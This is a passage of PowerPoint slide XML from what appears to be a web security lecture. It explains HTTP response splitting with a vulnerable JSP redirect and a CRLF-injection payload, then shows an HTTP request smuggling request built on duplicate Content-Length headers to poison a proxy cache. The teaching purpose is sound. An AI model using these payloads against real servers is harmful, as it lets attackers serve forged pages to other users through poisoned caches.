            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP request smuggling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230957142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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTTP Response Splitting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="906243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTTP response splitting exploits the fact that user provided data is included in the header of a reply</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>See: “HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics” by A. Klein</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389801846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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Redirection Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="907267" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>redir_lang.jsp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;%  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>response.sendRedirect("/by_lang.jsp?lang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>="+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>request.getParameter("lang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>"));  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>%&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example requesting the page with “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” set to “English” will create the following redirect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>HTTP/1.1 302 Moved Temporarily </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Date: Tue, 17 Nov 2015 12:53:28 GMT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Location: http://10.1.1.1/by_lang.jsp?lang=English</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;html&gt;Error...&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="408660320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a:t>Response Splitting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="908291" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if one performs the following request:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>redir_lang.jsp?lang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=foobar%0d%0aContent- Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent- Type:%20text/html%0d%0aContent- Length:%2019%0d%0a%0d%0a&lt;html&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Shazam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the server includes the value of the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” variable verbatim, the resulting answer may appear as two different replies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the attacker includes a request for /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, the second (fake) reply will be associated with it, possibly poisoning an intermediate cache</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196044766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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The Response Output </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="909315" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>HTTP/1.1 302 Moved Temporarily </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Date: Tue, 17 Nov 2015 15:26:41 GMT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Location: http://10.1.1.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>by_lang.jsp?lang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>foobar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Content-Length: 0  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>HTTP/1.1 200 OK </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Content-Type: text/html </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Content-Length: 19  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Shazam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;/html&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>...(ignored stuff here)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From now on an intermediate proxy will associate the second reply with /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>index.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="319670004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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTTP Request Smuggling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="911363" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This attack exploits the difference in the parsing procedures performed by different components in the request delivery process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, request is forged to confuse proxy and desynchronize its view from the view of the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See “HTTP Request Smuggling” by C. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Linhart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> et al.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="394995447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en-US"/>
              <a:t>HTTP Request Smuggling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="912387" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>1   POST http://SITE/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>foobar.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> HTTP/1.1  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>2   Host: SITE  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>3   Connection: Keep-Alive   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>4   Content-Type: application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>5   Content-Length: 0  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>6   Content-Length: 44  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>7   [CRLF]  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>8   GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>poison.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> HTTP/1.1  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>9   Host: SITE  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>10  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Bla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>: [space after the "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Bla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>:", but no CRLF]  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>11  GET http://SITE/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>page_to_poison.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> HTTP/1.1  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>12  Host: SITE  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>13  Connection: Keep-Alive  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>14  [CRLF] </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178175178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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTTP Request Smuggling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="913411" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The proxy parses the POST request in lines 1-7, and encounters the two "Content-Length" headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It decides to ignore the first header, so it assumes the request has a body of length 44 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It treats the data in lines 8-10 as the first request's body. Then it parses lines 11-14, which it treats as the client's second request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses the first "Content-Length" header and believes that the first POST request has no body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The second request is the GET in line 8 (notice that the GET in line 11 is parsed by the server as the value of the "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" header in line 10)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="112175786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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTTP Request Smuggling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="914435" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The server sends back the content of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>foobar.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>poison.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The proxy associates these requests to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>POST /foobar.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>GET /page_to_poison.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>From now on, every client asking for page_to_poison.html will receive poison.html, instead</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3877191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en-GB"/>
              <a:t>Replies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="828419" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
